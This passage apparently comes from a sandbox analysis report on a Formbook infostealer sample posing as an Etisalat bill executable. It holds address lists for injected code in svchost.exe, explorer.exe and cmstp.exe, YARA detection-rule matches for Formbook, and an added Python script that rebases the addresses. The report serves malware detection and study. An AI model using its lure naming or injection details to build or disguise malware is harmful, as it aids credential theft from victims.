          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030452A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305B2C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E12ED
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307516C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302F172
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0310B16B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304B1B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EF0CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030470C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F70E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF0E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF7B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03085630
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F16CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7571
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DD5B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031095C3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF43F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03031460
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFB76
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305FB80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B5BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307DBF9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFA49
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7A46
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B3A6C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DDAAC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03085AA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E1AA3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EDAC6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D5910
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03049950
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305B950
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AD800
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030438E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFF09
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03041F92
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFFB1
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03003FD2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03003FD5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03049EB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03043D40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F1D5A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7D73
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305FDC0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B9C32
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFCF2
          Source: C:\Windows\explorer.exe | Code function: 3_2_1095F232
          Source: C:\Windows\explorer.exe | Code function: 3_2_10955082
          Source: C:\Windows\explorer.exe | Code function: 3_2_1095E036
          Source: C:\Windows\explorer.exe | Code function: 3_2_109625CD
          Source: C:\Windows\explorer.exe | Code function: 3_2_1095C912
          Source: C:\Windows\explorer.exe | Code function: 3_2_10956D02
          Source: C:\Windows\explorer.exe | Code function: 3_2_10959B30
          Source: C:\Windows\explorer.exe | Code function: 3_2_10959B32
          Source: C:\Windows\explorer.exe | Code function: 3_2_10DFC082
          Source: C:\Windows\explorer.exe | Code function: 3_2_10E05036
          Source: C:\Windows\explorer.exe | Code function: 3_2_10E095CD
          Source: C:\Windows\explorer.exe | Code function: 3_2_10DFDD02
          Source: C:\Windows\explorer.exe | Code function: 3_2_10E03912
          Source: C:\Windows\explorer.exe | Code function: 3_2_10E06232
          Source: C:\Windows\explorer.exe | Code function: 3_2_10E00B30
          Source: C:\Windows\explorer.exe | Code function: 3_2_10E00B32
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00ADB634
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DEE4F6
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DF2446
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DE4420
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04E00591
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D40535
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D5C6E0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D3C7C0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D64750
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D40770
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DD2000
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DF81CC
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04E001AA
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DF41A2
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DC8158
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DDA118
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D30100
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DC02C0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DE0274
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04E003E6
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D4E3F0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFA352
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D30CF2
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DE0CB5
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D40C00
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D3ADE0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D58DBF
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DDCD1F
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D4AD00
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFEEDB
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D52E90
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFCE93
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D40E59
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFEE26
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D32FC8
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D4CFE0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DBEFA0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DB4F40
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D60F30
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DE2F30
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D82F28
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D6E8F0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D268B8
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D4A840
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D42840
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04E0A9A6
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D429A0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D56962
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D3EA80
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DF6BD7
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFAB40
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D31460
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFF43F
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04E095C3
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DDD5B0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DF7571
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DF16CC
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D85630
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFF7B0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DEF0CC
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D470C0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DF70E9
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFF0E0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D4B1B0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04E0B16B
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D2F172
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D7516C
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D5B2C0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DE12ED
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D452A0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D8739A
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D2D34C
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DF132D
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFFCF2
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DB9C32
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D5FDC0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DF1D5A
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D43D40
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DF7D73
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D49EB0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D03FD2
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D03FD5
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D41F92
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFFFB1
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFFF09
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D438E0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DAD800
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D49950
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D5B950
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DD5910
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DEDAC6
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DDDAAC
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D85AA0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DE1AA3
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFFA49
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DF7A46
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DB3A6C
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DB5BF0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D7DBF9
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D5FB80
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04DFFB76
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E5E1AE
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E5D596
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E49E50
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E42FB0
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E5DF37
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E42D90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0302B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03087E54 appears 111 times
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: String function: 00B88B40 appears 42 times
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: String function: 00B80D27 appears 70 times
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: String function: 00B67F41 appears 35 times
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 04DAEA12 appears 86 times
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 04D2B970 appears 280 times
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 04DBF290 appears 105 times
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 04D87E54 appears 111 times
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 04D75130 appears 58 times
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 00ADE951 appears 100 times
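The function and string-function addresses listed above for svchost.exe (process 2) and cmstp.exe (process 4) line up once a constant offset of 0x01D00000 is applied (03003FD5 and 04D03FD5, 030BF290 and 04DBF290 with the same 105 hits, and so on), and the explorer.exe (process 3) list contains every function twice, 0x004A7000 apart. That is what one payload image mapped at several base addresses looks like in a function list. The script below is an added example, not part of the Joe Sandbox report: it recovers those offsets from the raw address lists by taking pairwise differences and keeping the most frequent one, then pairs the string-function hit counts across the two processes. The addresses are copied from the lines above (the cmstp.exe list is a subset); the function names are mine.

```python
"""Rebase the function addresses listed above to show that the code injected
into svchost.exe (process 2) and cmstp.exe (process 4) is the same image at
two base addresses, and that explorer.exe (process 3) holds two copies of it.
Added example for this report; address lists are copied from the lines above
(the cmstp.exe list is a subset), and the function names are assumptions."""
from collections import Counter

# "Code function" addresses from the svchost.exe lines (process 2).
SVCHOST_FUNCS = [0x03003FD5, 0x03049EB0, 0x03043D40, 0x030F1D5A,
                 0x030F7D73, 0x0305FDC0, 0x030B9C32, 0x030FFCF2]

# Subset of the cmstp.exe "Code function" addresses (process 4), including
# cmstp's own code at 0x00AD.... and the second region at 0x02E4.... so the
# search has non-matching addresses to reject.
CMSTP_FUNCS = [0x00ADB634, 0x04DEE4F6, 0x04DF2446, 0x04DE4420, 0x04E00591,
               0x04D40535, 0x04D5C6E0, 0x04D3C7C0, 0x04D64750, 0x04D40770,
               0x04DD2000, 0x04DF81CC, 0x04E001AA, 0x04DF41A2, 0x04DFFCF2,
               0x04DB9C32, 0x04D5FDC0, 0x04DF1D5A, 0x04D43D40, 0x04DF7D73,
               0x04D49EB0, 0x04D03FD2, 0x04D03FD5, 0x02E5E1AE, 0x02E49E50]

# All sixteen explorer.exe "Code function" addresses (process 3).
EXPLORER_FUNCS = [0x1095F232, 0x10955082, 0x1095E036, 0x109625CD,
                  0x1095C912, 0x10956D02, 0x10959B30, 0x10959B32,
                  0x10DFC082, 0x10E05036, 0x10E095CD, 0x10DFDD02,
                  0x10E03912, 0x10E06232, 0x10E00B30, 0x10E00B32]

# "String function ... appears N times" entries, address -> hit count.
SVCHOST_STRFUNCS = {0x030BF290: 105, 0x03075130: 58, 0x030AEA12: 86,
                    0x0302B970: 280, 0x03087E54: 111}
CMSTP_STRFUNCS = {0x04DAEA12: 86, 0x04D2B970: 280, 0x04DBF290: 105,
                  0x04D87E54: 111, 0x04D75130: 58, 0x00ADE951: 100}


def best_rebase(src, dst, positive_only=False):
    """Find the constant offset that maps the most addresses in src onto
    addresses in dst.  Returns (delta, matched_pairs).  With positive_only,
    only dst > src differences are counted, which is what you want when
    comparing a list against itself to find a second mapping of one image."""
    dst_set = set(dst)
    deltas = Counter(d - s for s in src for d in dst
                     if d != s and (d > s or not positive_only))
    if not deltas:
        return 0, []
    delta = deltas.most_common(1)[0][0]
    pairs = [(s, s + delta) for s in src if s + delta in dst_set]
    return delta, pairs


def rebased_string_functions(src_counts, dst_counts, delta):
    """Pair each string-function hit count in src with the count found at the
    rebased address in dst (None when that address is absent in dst)."""
    return {addr: (n, dst_counts.get(addr + delta))
            for addr, n in src_counts.items()}


def string_functions_agree(src_counts, dst_counts, delta):
    """True when every src string function exists in dst at addr + delta with
    the same hit count: a strong sign the two regions are one image."""
    return all(n == m for n, m in
               rebased_string_functions(src_counts, dst_counts, delta).values())


if __name__ == "__main__":
    delta, pairs = best_rebase(SVCHOST_FUNCS, CMSTP_FUNCS)
    print(f"svchost -> cmstp: delta 0x{delta:08X}, "
          f"{len(pairs)}/{len(SVCHOST_FUNCS)} functions match")
    for s, d in pairs:
        print(f"  {s:08X} -> {d:08X}")
    print("string-function hit counts agree:",
          string_functions_agree(SVCHOST_STRFUNCS, CMSTP_STRFUNCS, delta))
    delta2, pairs2 = best_rebase(EXPLORER_FUNCS, EXPLORER_FUNCS, positive_only=True)
    print(f"explorer self-match: delta 0x{delta2:08X}, "
          f"{len(pairs2)} functions present twice")
```

The same rebasing step is how you would decide whether a YARA hit in one process dump is the same code as a hit in another, or whether a memory region is a second copy of a known payload rather than something new: agreeing string-function hit counts at the rebased addresses are hard to produce by coincidence.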
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976844124.0000000004063000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename ntdll.dllj% vs Details of Your Etisalat Summary Bill for the Month of May 2024.exe
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976988587.000000000420D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename ntdll.dllj% vs Details of Your Etisalat Summary Bill for the Month of May 2024.exe
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.4443389899.0000000010977000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
